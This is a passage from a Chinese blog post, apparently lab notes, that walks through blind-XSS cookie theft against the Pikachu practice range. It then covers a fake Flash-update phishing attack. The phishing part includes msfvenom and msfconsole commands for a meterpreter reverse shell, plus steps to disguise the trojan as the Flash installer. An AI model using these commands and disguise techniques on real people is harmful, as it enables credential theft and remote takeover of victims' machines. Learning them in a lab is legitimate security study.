XSS-窃取Cookie和Flash攻击钓⻥

最新推荐文章于 2024-07-24 10:40:52 发布
最新推荐文章于 2024-07-24 10:40:52 发布
阅读量347 收藏 6
点赞数 9
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57240513/article/details/140645314
版权

一、XSS-窃取Cookie

第一步:进去http://xssaq.com

第二步:登陆-创建项目一个test-提交项目

9fb976d06fd643413e20bf014455e952

第三步:我的项目中选择test项目

b0b9f87419de8a76ea2e43105cdd5ec2

第四步:点击查看配置代码

e8c5cc607bd0a88c188a1ab6deec5a4e

第五步:复制script代码

8bb46aba9f767d5eb462a1c7d08f1a7d

第六步:打开皮卡酷-xss盲打的那一关,使用账号密码登陆,将复制的恶意代码粘贴进去

fb83ed6456dac0c1070afd1dc7364486

第七步:模拟管理员登录后台的操作,用管理员密码登陆

aa3d7b9225d20bcea8d261fcb662ad52

e01cdf538e23595ef87a834202b34c9a

第八步:回到平台查看到管理员的账号和密码,窃取cookie

c7a36b1e6c3ce4b5ca2adc36fdc71ab0

fb1e7ea6d530065344aff8edae9bd2dd

二、XSS-Flash攻击钓⻥

第一步:在phpdtuday打开web服务,下载课件里的项目zip文件(Github),第一个文件(名字长的),把它拖进www目录,修改html文件里面的代码地址为我们

步骤三:来到xss平台点击公共模块 、flash弹窗钓鱼,将其中的代码保存为一个js文件

image-20240723193751392

步骤四:把js文件中的地址代码改为http://127.0.01,然后去Flash Player官方下载中心-Flash中国官网下载flash软件安装包

步骤五:打开kali运行命令-代码如下


# MSF⽣成Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=44
44 -f exe > shell.exe
#开启监听
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.7
set lport 4444
run

image-20240723171336151

 

image-20240723171603038

image-20240723171848549

步骤六:看下ip-把shell文件和软件压缩到一起(使用winrar压缩软件)

image-20240723184828541

image-20240723190211712

复制flash的文件名称到压缩文件名

image-20240723184913582

image-20240723184229469

image-20240723185114127

image-20240723184322631

image-20240723184350545

image-20240723184411839

image-20240723184440648

高级-更新(选择第二个)-模式里的全部影藏-文件名称

步骤七:修改图标

将官方flash的程序拖进去

image-20240723192012654

保存flash的图标,再将压缩后的程序拖进去

image-20240723192331372

保存后就可以看到图标变化了

image-20240723193346805

步骤八:模拟受害者的流程-获取受害者的

打开皮卡酷的xss盲打页面

image-20240723195222042

复制链接打开管理员用户界面

image-20240723195433712

输入用户名密码登陆

image-20240723195612741

页面跳转到下载界面

image-20240723195651138

后面模拟受害者下载木马程序,然后在kali里面监听

image-20240723195908202

监听成功

Mr.sloane
关注
  • 9
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss-vuln学习通关总结
08-24
5. **基于Flash的跨站XSS**:属于反射型XSS的一种,通过Flash中的AS脚本操作cookie,配合其他XSS攻击方法,窃取和操纵cookie。避免方法包括限制cookie的读写权限和对Flash输入参数进行过滤和转义。 **HTTP基础知识*...
XSS -攻击防御手册.pdf
07-26
XSS攻击主要分为三种类型:存储型XSS、反射型XSS和DOM型XSS。 1. **存储型XSS**:恶意脚本被存储在服务器数据库中,当其他用户访问该页面时,脚本将自动执行,影响范围广泛且持续时间长。 2. **反射型XSS**:攻击者...
XSS跨站脚本攻击剖析与防御
04-03
- cookie窃取攻击者可以通过XSS获取用户的session cookie,实现会话劫持。 - 攻击:利用XSS构造仿冒页面,引导用户输入敏感信息,如用户名、密码等。 - 跨站请求伪造(CSRF):XSS可以辅助CSRF攻击,让受害...
web跨站点脚本攻击方式和测试方法.doc
10-11
XSS攻击的威胁非常广泛,攻击者可以通过注入的脚本窃取用户的Cookie,进而冒充用户身份;执行跨站请求伪造(CSRF),对用户的数据进行非法操作;利用ActiveX或Flash执行恶意代码;甚至引导用户下载恶意软件。尤其是...
看一看XSS_原来像梦一场.pdf
09-11
XSS(跨站脚本攻击)详解】 XSS,全称为跨站脚本(Cross-Site Scripting),是一种常见的网络安全漏洞,攻击者通过利用...通过深入理解XSS的工作原理和攻击手段,我们可以更好地构建安全的网络环境,抵御这类攻击
记一次因敏感信息泄露而导致的越权+存储型XSS
2301_80127209的博客
07-23 335
可能各位师傅会有苦于不知道如何寻找测试目标的烦恼,这里我惯用的就是寻找可进站的思路。这个思路分为两种,一是弱口令进站测试,二是可注册进站测试。依照这个思路,我依旧是用鹰图进行了一波资产的搜集。
CSRF+XSS组合攻击实战
记录学习
07-19 1348
xss和csrf组合攻击漏洞复现
【WAF剖析】10种XSS某狗waf绕过姿势,以及思路分析
xt350488的博客
07-22 1531
xss基础教程参考:https://mp.weixin.qq.com/s/RJcOZuscU07BEPgK89LSrQsql注入waf绕过文章参考: https://mp.weixin.qq.com/s/Dhtc-8I2lBp95cqSwr0YQw。
前端面试题日常练-day97 【Less】
qq_44640575的博客
07-20 470
border-radius()函数用于在Less中生成圆形边框效果。通过设置border-radius()函数,我们可以为元素的边框添加圆角效果,使边框呈现圆形的外观,从而美化页面元素的边框样式。
谷粒商城实战笔记-39-前端基础-Vue-指令-v-on、v-for、v-if
epitomizelu的专栏
07-20 997
v-on 是 Vue.js 中的一个指令,用于在 DOM 元素上监听用户事件,并在事件触发时执行相应的 JavaScript 函数。它提供了一种将 Vue 实例中的方法与 DOM 事件关联起来的方式,使得你可以轻松地对用户交互做出响应。v-on 指令的基本语法是在元素上添加 v-on:event-name=“method”,其中 event-name 是你要监听的 DOM 事件类型(如 click、mouseover、keydown 等),method 则是 Vue 实例中定义的方法名。
TS如何处理js模块的类型?
最新发布
闻人放歌的三寸青草园圃
07-24 83
【代码】TS如何处理js模块的类型?
Odoo Registry 源码解读:前端世界的魔法师
清水欧度 Odoo ERP
07-23 855
它是连接不同模块的桥梁,是实现灵活扩展的关键,是每个Odoo开发魔法师最强大的盟友。下次当你在编写Odoo模块时,请记住,你手中握着的不仅仅是键盘,而是Registry赋予你的魔法杖。想象一下,它就是Odoo世界里的预言球,所有的秘密都逃不过它的法眼。Registry会用它的魔法排序棒,确保每个生物都按照正确的顺序出场,场面蔚为壮观。Registry会把常用的魔法结果记在它的魔法笔记本里,下次再用时就不用重新计算了,节省了大量的魔法能量。Registry设置了强大的防御魔法,确保没有人能破坏它的魔法秩序。
基于 Gunicorn、Flask 和 Docker 的 Web 应用开发
2401_85639015的博客
07-19 1570
Docker 是一个开源的应用容器引擎,它允许开发者打包他们的应用以及应用的运行环境到一个可移植的容器中。容器可以运行在任何支持 Docker 的机器上,确保了环境的一致性。通过本教程,你将学会如何使用 Docker、Gunicorn 和 Flask 构建一个高效、可扩展的 Web 应用。每个步骤都提供了详细的指导和示例代码,确保你能够理解和实践每个环节。希望本教程能够作为你进入微服务架构领域的起点。
Web Pages 表单
07-20 326
Web pages 表单是现代网页设计中不可或缺的组成部分,它们允许用户与网站进行交互,提交信息,如注册、登录、反馈、预订等。表单的设计和功能对用户体验和网站的业务目标有着直接的影响。本文将深入探讨Web pages表单的各个方面,包括设计原则、常用元素、验证机制和最佳实践。
vue如何解决跨域?
FENGZXCjjjjj的博客
07-21 505
在Vue.js项目中,当你的前端应用尝试从与自身不同源的服务器(协议、域名、端口中的任一不同)加载资源时,可能会遇到跨域(CORS, Cross-Origin Resource Sharing)问题。
thinkphp8结合layui2.9 图片上传验证
quweiie的专栏
07-21 311
thinkphp8图片上传的验证
Vue事件总线(EventBus)的概念、使用以及注意事项
weixin_53216033的博客
07-23 584
在Vue开发中,组件间的通信是不可避免的需求。对于父子组件间的通信,Vue提供了props和$emit/$on等内置机制。然而,当需要在非父子关系的组件间进行通信时,这些内置机制就显得力不从心了。这时,Vue事件总线(EventBus)作为一种灵活的解决方案应运而生啦。本篇文章将详细讲解Vue事件总线的原理、安装、使用及最佳实践,帮助大家更好地去理解和应用这一技术。
Known框架实战演练——进销存基础数据
knownchen的专栏
07-23 300
本文介绍如何实现进销存管理系统的基础数据模块,基础数据模块包括商品信息、供应商管理和客户管理3个菜单页面。供应商和客户字段相同,因此可共用一个页面组件类。
vue3前端开发-小兔鲜项目-一级页面banner图渲染
yrldjsbk的博客
07-19 421
其实,首页的banner渲染代码可以拿来复用的,只是区别在于,传递的接口参数不一样而已。我们的一级页面就可以成功拿到了后端接口反馈过来的一级栏目的banner图信息了。我们增加了一个参数对象params.而且做好了默认值的设置。(用的是一种解构赋值的模式)1:改造一下之前的获取banner的接口调用函数,增加一个参数对象。2:把之前HomeBanner.vue里面的代码,拿过来,在template里面新增banner的渲染模块内容。写好默认的值1.(不赋值的情况下,就是这个默认值1)3:修改完善页面内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值